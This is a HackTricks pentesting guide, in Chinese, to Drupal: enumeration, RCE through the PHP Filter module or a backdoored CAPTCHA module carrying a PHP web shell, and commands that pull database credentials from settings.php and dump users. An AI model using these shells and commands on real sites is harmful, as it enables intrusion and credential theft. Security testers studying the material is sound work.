hacktricks/network-services-pentesting/pentesting-web/drupal.md

Drupal

从零到英雄学习AWS黑客攻击 htARTE (HackTricks AWS Red Team Expert)！

支持HackTricks的其他方式：

• 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF，请查看订阅计划！
• 获取官方PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

发现

• 检查 meta标签

curl https://www.drupal.org/ | grep 'content="Drupal'

• 节点：Drupal 使用节点索引其内容。节点可以包含任何内容，例如博客帖子、投票、文章等。页面URI通常是 /node/<nodeid> 的形式。

curl drupal-site.com/node/1

枚举

Drupal 默认支持三种类型的用户：

1. 管理员：该用户对 Drupal 网站拥有完全控制权。
2. 认证用户：这些用户可以登录网站，并根据他们的权限执行添加和编辑文章等操作。
3. 匿名用户：所有网站访问者默认被视为匿名用户。默认情况下，这些用户只被允许阅读帖子。

版本

• 检查 /CHANGELOG.txt

curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""

Drupal 7.57, 2018-02-21

{% hint style="info" %} Drupal 的新安装默认会阻止访问 CHANGELOG.txt 和 README.txt 文件。 {% endhint %}

用户名枚举

注册

在 /user/register 尝试创建一个用户名，如果名称已被占用，将会收到通知：

请求新密码

如果为现有用户名请求新密码：

如果为不存在的用户名请求新密码：

获取用户数量

访问 /user/<number> 可以看到现有用户的数量，在这个例子中是2，因为 /users/3 返回了未找到错误：

隐藏页面

对 /node/$ 进行模糊测试，其中 $ 是一个数字（例如从1到500）。
你可能会发现 隐藏页面（测试，开发），这些页面没有被搜索引擎引用。

已安装模块信息

#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml

# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml

自动化

droopescan scan drupal -u http://drupal-site.local

RCE

使用 PHP Filter 模块

{% hint style="warning" %} 在Drupal的旧版本中 (8版本之前)，可以作为管理员登录并启用 PHP filter 模块，它允许“评估嵌入的PHP代码/片段。” {% endhint %}

你需要安装 PHP 插件（通过访问 /modules/php 检查，如果返回 403 则表示存在，如果未找到，则表示PHP 插件未安装）

转到 Modules -> （勾选）PHP Filter -> Save configuration

然后点击 Add content -> 选择 Basic Page 或 Article -> 在正文中写入 php shellcode -> 在 Text format 中选择 PHP code -> 选择 Preview

最后只需访问新创建的节点：

curl http://drupal-site.local/node/3

安装 PHP Filter 模块

从 8 版本开始，PHP Filter 模块默认不会安装。要使用这个功能，我们需要自己安装模块。

1. 从 Drupal 网站下载模块的最新版本。
2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
3. 下载完成后，转到 管理 > 报告 > 可用更新。
4. 点击 浏览，选择我们下载到的目录中的文件，然后点击 安装。
5. 安装模块后，我们可以点击 内容 并创建一个新的基本页面，类似于我们在 Drupal 7 示例中所做的。同样，确保从 文本格式 下拉菜单中选择 PHP 代码。

后门模块

可以通过向现有模块添加 shell 来创建后门模块。可以在 drupal.org 网站上找到模块。我们选择一个像 CAPTCHA 这样的模块。向下滚动并复制 tar.gz 存档的链接。

• 下载存档并提取其内容。

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

• 创建一个包含以下内容的 PHP web shell：

<?php
system($_GET["cmd"]);
?>

• 接下来，我们需要创建一个 .htaccess 文件以便我们能够访问文件夹。这是必要的，因为Drupal拒绝直接访问 /modules 文件夹。

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

• 上述配置将在我们请求 /modules 中的文件时，为 / 文件夹应用规则。复制这两个文件到 captcha 文件夹并创建一个存档。

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

• 假设我们拥有网站的管理员访问权限，点击侧边栏的 管理 然后 扩展。接下来，点击 + 安装新模块 按钮，我们将被带到安装页面，例如 http://drupal-site.local/admin/modules/install 浏览到带后门的Captcha存档并点击 安装。
• 安装成功后，浏览到 /modules/captcha/shell.php 来执行命令。

后期利用

读取 settings.php

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null

从数据库中导出用户

mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'

参考资料

• https://academy.hackthebox.com/module/113/section/1209

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客技术！

支持HackTricks的其他方式：

• 如果您希望在HackTricks中看到您的公司广告或下载HackTricks的PDF版本，请查看订阅计划！
• 获取官方的PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。